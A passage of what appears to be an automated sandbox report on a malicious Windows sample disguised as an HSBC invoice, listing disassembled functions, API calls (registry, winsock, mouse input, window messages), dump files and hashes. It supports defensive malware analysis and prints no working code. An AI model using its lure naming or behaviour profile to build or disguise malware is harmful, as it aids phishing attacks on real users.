                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00F078B9
                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00F078C8
                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00F078D4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: MessageSend$CreateObjectStockWindow
                    • String ID: Msctls_Progress32
                    • API String ID: 1025951953-3636473452
                    • Opcode ID: d7e04d207f1ee576a6062b2ab64d7a9fdb19c2fadf6cc073abbf1ed20007e860
                    • Instruction ID: 0c7da50bf85f63c77fde4e4a4467e01f28b119a6740b8cfc600e7390284b6dd8
                    • Opcode Fuzzy Hash: d7e04d207f1ee576a6062b2ab64d7a9fdb19c2fadf6cc073abbf1ed20007e860
                    • Instruction Fuzzy Hash: FE1163B2550219BFEF159F60CC85EE77F5DEF08768F118115FA04A60A0D772AC21EBA4
                    Function 00EA41C9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize), ref: 00EA41E3
                    • GetProcAddress.KERNEL32(00000000), ref: 00EA41EA
                    • RtlEncodePointer.NTDLL(00000000), ref: 00EA41F6
                    • RtlDecodePointer.NTDLL(00000001), ref: 00EA4213
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                    • String ID: RoInitialize$combase.dll
                    • API String ID: 3489934621-340411864
                    • Opcode ID: e2ce78c40b03a326d76e98cba0d2193152c9e687b9714555fc88a720aa248ed3
                    • Instruction ID: bba69699bc667a5beaffbe1491385c7096b9eb544f6d55a64cae73c52b0984ef
                    • Opcode Fuzzy Hash: e2ce78c40b03a326d76e98cba0d2193152c9e687b9714555fc88a720aa248ed3
                    • Instruction Fuzzy Hash: 22E01AF8690348AFEB315BB0EC09B443AA4B7B6706F109424B811F94E0DBB574D9BF00
                    Function 00EA429E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00EA41B8), ref: 00EA42B8
                    • GetProcAddress.KERNEL32(00000000), ref: 00EA42BF
                    • RtlEncodePointer.NTDLL(00000000), ref: 00EA42CA
                    • RtlDecodePointer.NTDLL(00EA41B8), ref: 00EA42E5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                    • String ID: RoUninitialize$combase.dll
                    • API String ID: 3489934621-2819208100
                    • Opcode ID: e724bc5ab711bf90574b6a5226a94180c64aee0cbb6637e2f4b961c22c643b68
                    • Instruction ID: 4947b0c10c0776ee9adc3579ef490211c86a841519d90547d0e32c9c87327d87
                    • Opcode Fuzzy Hash: e724bc5ab711bf90574b6a5226a94180c64aee0cbb6637e2f4b961c22c643b68
                    • Instruction Fuzzy Hash: 5AE0BF7C5413089BEB619B60FD0EB443AA4B766746F205025F401F54B0CBB4A594FA15
                    Function 00EF6E17 Relevance: 9.2, APIs: 6, Instructions: 250networkCOMMON
                    Download Yara Rule
                    APIs
                    • __WSAFDIsSet.WS2_32(00000000,?), ref: 00EF6F14
                    • WSAGetLastError.WS2_32(00000000), ref: 00EF6F48
                    • htons.WS2_32(?), ref: 00EF6FFE
                    • inet_ntoa.WS2_32(?), ref: 00EF6FBB
                      • Part of subcall function 00EDAE14: _strlen.LIBCMT ref: 00EDAE1E
                      • Part of subcall function 00EDAE14: _memmove.LIBCMT ref: 00EDAE40
                    • _strlen.LIBCMT ref: 00EF7058
                    • _memmove.LIBCMT ref: 00EF70C1
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                    • String ID:
                    • API String ID: 3619996494-0
                    • Opcode ID: 4f55a4b06496d36b1b55ad8736d0dace6e4f7827f89d58ac490be4b8b5ff3b76
                    • Instruction ID: 9cf74cd404a7e4dbdb43935c140826b50ba2cd1dadcfe2589b82950b55e50a6b
                    • Opcode Fuzzy Hash: 4f55a4b06496d36b1b55ad8736d0dace6e4f7827f89d58ac490be4b8b5ff3b76
                    • Instruction Fuzzy Hash: 8C81CF32508304ABD710EB24CC81E7BB7E9AF84718F146919F659AB292DA71AD05C792
                    Function 00EE675A Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: _memmove$__itow__swprintf
                    • String ID:
                    • API String ID: 3253778849-0
                    • Opcode ID: fbb2d1d40f4c81195ce3c36d950c9e76a75fce58676de37b554099b96ca2b291
                    • Instruction ID: 87e657c5aa5973d677dd2c440333dacdea5116dc508d0615ca761f6d14889ad8
                    • Opcode Fuzzy Hash: fbb2d1d40f4c81195ce3c36d950c9e76a75fce58676de37b554099b96ca2b291
                    • Instruction Fuzzy Hash: 2561893050029A9BCF15EF61CC82EFE77A4AF99348F086559F8597B292DB31AD41CB50
                    Function 00F0046F Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E87F41: _memmove.LIBCMT ref: 00E87F82
                      • Part of subcall function 00F010A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F00038,?,?), ref: 00F010BC
                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F00548
                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F00588
                    • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00F005AB
                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00F005D4
                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00F00617
                    • RegCloseKey.ADVAPI32(00000000), ref: 00F00624
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                    • String ID:
                    • API String ID: 4046560759-0
                    • Opcode ID: a98daeb23c7bb34f3b4cfb66ebfdb6cf38e39ea4014ac5e66c23727bf5a9163b
                    • Instruction ID: 4e4575c1a4c91ccafac4abf7ed34b3671295b8d60ca3d65160965319af14a328
                    • Opcode Fuzzy Hash: a98daeb23c7bb34f3b4cfb66ebfdb6cf38e39ea4014ac5e66c23727bf5a9163b
                    • Instruction Fuzzy Hash: ED515931608200AFCB14EB24CC85E6FBBE9FF88714F04491DF599972A1DB31E905EB52
                    Function 00F05A20 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetMenu.USER32(?), ref: 00F05A82
                    • GetMenuItemCount.USER32(00000000), ref: 00F05AB9
                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00F05AE1
                    • GetMenuItemID.USER32(?,?), ref: 00F05B50
                    • GetSubMenu.USER32(?,?), ref: 00F05B5E
                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 00F05BAF
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Menu$Item$CountMessagePostString
                    • String ID:
                    • API String ID: 650687236-0
                    • Opcode ID: 6c0564c9c8099a21c4efe36830c10bb8f9ab71158cfd8594c39ec23ef236bc65
                    • Instruction ID: 3448ffd3b02c811703c69f70dc0c381960bfe864bc38e10ef1f9400e3c53bc15
                    • Opcode Fuzzy Hash: 6c0564c9c8099a21c4efe36830c10bb8f9ab71158cfd8594c39ec23ef236bc65
                    • Instruction Fuzzy Hash: 00519F75E00619AFCB10EFA4C845AAEB7F4EF48720F104099E805BB291CB74BE41EF90
                    Function 00EDF3DD Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                    Download Yara Rule
                    APIs
                    • VariantInit.OLEAUT32(?), ref: 00EDF3F7
                    • VariantClear.OLEAUT32(00000013), ref: 00EDF469
                    • VariantClear.OLEAUT32(00000000), ref: 00EDF4C4
                    • _memmove.LIBCMT ref: 00EDF4EE
                    • VariantClear.OLEAUT32(?), ref: 00EDF53B
                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00EDF569
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Variant$Clear$ChangeInitType_memmove
                    • String ID:
                    • API String ID: 1101466143-0
                    • Opcode ID: f12e6ed4d8c2af45c5e4f4605a830d452027f307be476667d410f3ad8fe75b7b
                    • Instruction ID: 28bfb69ad9e11a9637667f02720f499b7ca627903187af94a19d9ffe8350ab3b
                    • Opcode Fuzzy Hash: f12e6ed4d8c2af45c5e4f4605a830d452027f307be476667d410f3ad8fe75b7b
                    • Instruction Fuzzy Hash: C9513CB5A00209DFCB14CF58D884AAAB7F8FF4C354B15856AED59EB311D730E952CBA0
                    Function 00EE26F9 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00EE2747
                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EE2792
                    • IsMenu.USER32(00000000), ref: 00EE27B2
                    • CreatePopupMenu.USER32 ref: 00EE27E6
                    • GetMenuItemCount.USER32(000000FF), ref: 00EE2844
                    • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00EE2875
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                    • String ID:
                    • API String ID: 3311875123-0
                    • Opcode ID: 05ae6f60e648d02e14a00773e80a05e9309abb484d20bb37dc5a852fb94f5f16
                    • Instruction ID: b883a90320c4cec647f90d46e7f6cee47eb03b541d99d5b1daf760580d1df3fe
                    • Opcode Fuzzy Hash: 05ae6f60e648d02e14a00773e80a05e9309abb484d20bb37dc5a852fb94f5f16
                    • Instruction Fuzzy Hash: 4F51B070A0038DDBDF28CF6AD888AAEBBF8BF44318F14516DE615AB291D7708904CB55
                    Function 00E81765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E82612: GetWindowLongW.USER32(?,000000EB), ref: 00E82623
                    • BeginPaint.USER32(?,?,?,?,?,?), ref: 00E8179A
                    • GetWindowRect.USER32(?,?), ref: 00E817FE
                    • ScreenToClient.USER32(?,?), ref: 00E8181B
                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00E8182C
                    • EndPaint.USER32(?,?), ref: 00E81876
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: PaintWindow$BeginClientLongRectScreenViewport
                    • String ID:
                    • API String ID: 1827037458-0
                    • Opcode ID: b416a711d42bdad425aa3a76bb02b3cf54bd4af87b8e7ea0974e4c9f75c8b849
                    • Instruction ID: d2d8fc351051a9e9e1dec9df4e0e1e3acb27f1604a615ccb1a8d57a09baaf674
                    • Opcode Fuzzy Hash: b416a711d42bdad425aa3a76bb02b3cf54bd4af87b8e7ea0974e4c9f75c8b849
                    • Instruction Fuzzy Hash: FC41A0705043049FD720EF24CC85FBA7BE8FB5A724F040669F9A8D62A1C7719846EB62
                    Function 00F0B958 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                    Download Yara Rule
                    APIs
                    • ShowWindow.USER32(00F467B0,00000000,011B3B98,?,?,00F467B0,?,00F0B862,?,?), ref: 00F0B9CC
                    • EnableWindow.USER32(00000000,00000000), ref: 00F0B9F0
                    • ShowWindow.USER32(00F467B0,00000000,011B3B98,?,?,00F467B0,?,00F0B862,?,?), ref: 00F0BA50
                    • ShowWindow.USER32(00000000,00000004,?,00F0B862,?,?), ref: 00F0BA62
                    • EnableWindow.USER32(00000000,00000001), ref: 00F0BA86
                    • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00F0BAA9
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Window$Show$Enable$MessageSend
                    • String ID:
                    • API String ID: 642888154-0
                    • Opcode ID: de8a297c1c43cce4a619741de79239f3563b0a2c135b7456a47b9386f3c1767a
                    • Instruction ID: a48c9717739f903213af3cb344213e9c6c6d99bfcce7cfd2e66dcd07a943d143
                    • Opcode Fuzzy Hash: de8a297c1c43cce4a619741de79239f3563b0a2c135b7456a47b9386f3c1767a
                    • Instruction Fuzzy Hash: D8413034A00245AFDB26CF18C489B957BE1FB05725F1842B9EE488F6E2C735A845FB61
                    Function 00EF73B1 Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                    Download Yara Rule
                    APIs
                    • GetForegroundWindow.USER32(?,?,?,?,?,?,00EF5134,?,?,00000000,00000001), ref: 00EF73BF
                      • Part of subcall function 00EF3C94: GetWindowRect.USER32(?,?), ref: 00EF3CA7
                    • GetDesktopWindow.USER32 ref: 00EF73E9
                    • GetWindowRect.USER32(00000000), ref: 00EF73F0
                    • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00EF7422
                      • Part of subcall function 00EE54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00EE555E
                    • GetCursorPos.USER32(?), ref: 00EF744E
                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00EF74AC
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                    • String ID:
                    • API String ID: 4137160315-0
                    • Opcode ID: feaab00622d93821d7f90b04b3582377a2de19918f84da50c391d9ffb8d37539
                    • Instruction ID: 7bdf8a8a7f9ffadc09420374fd5805fe466b177c74b491e96b1fe667e0e010f1
                    • Opcode Fuzzy Hash: feaab00622d93821d7f90b04b3582377a2de19918f84da50c391d9ffb8d37539
                    • Instruction Fuzzy Hash: 5131E872508309ABD720DF54DC49F6BBBDAFF88314F001919F995A7191CB30E909CB92
                    Function 00EDE0B5 Relevance: 9.1, APIs: 6, Instructions: 90memoryCOMMON
                    Download Yara Rule
                    APIs
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00EDE0FA
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00EDE120
                    • SysAllocString.OLEAUT32(00000000), ref: 00EDE123
                    • SysAllocString.OLEAUT32 ref: 00EDE144
                    • SysFreeString.OLEAUT32 ref: 00EDE14D
                    • SysAllocString.OLEAUT32(?), ref: 00EDE175
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: String$Alloc$ByteCharMultiWide$Free
                    • String ID:
                    • API String ID: 1313759350-0
                    • Opcode ID: 45e86dcf0d5a13dd7b09985ab885263deae0f4d0da6a5d2d910a937686e1bd66
                    • Instruction ID: 6ef7b96b47ac4add2cd5934d9938395b314f82565df0116398598b3ed85ede47
                    • Opcode Fuzzy Hash: 45e86dcf0d5a13dd7b09985ab885263deae0f4d0da6a5d2d910a937686e1bd66
                    • Instruction Fuzzy Hash: 9C213135605208AFDB20AFA8DC88DAB77ECFB09764B108126F915DB760DA709C469B64
                    Function 00EEED8E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 323COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E89997: __itow.LIBCMT ref: 00E899C2
                      • Part of subcall function 00E89997: __swprintf.LIBCMT ref: 00E89A0C
                      • Part of subcall function 00E9FEC6: _wcscpy.LIBCMT ref: 00E9FEE9
                    • _wcstok.LIBCMT ref: 00EEEEFF
                    • _wcscpy.LIBCMT ref: 00EEEF8E
                    • _memset.LIBCMT ref: 00EEEFC1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
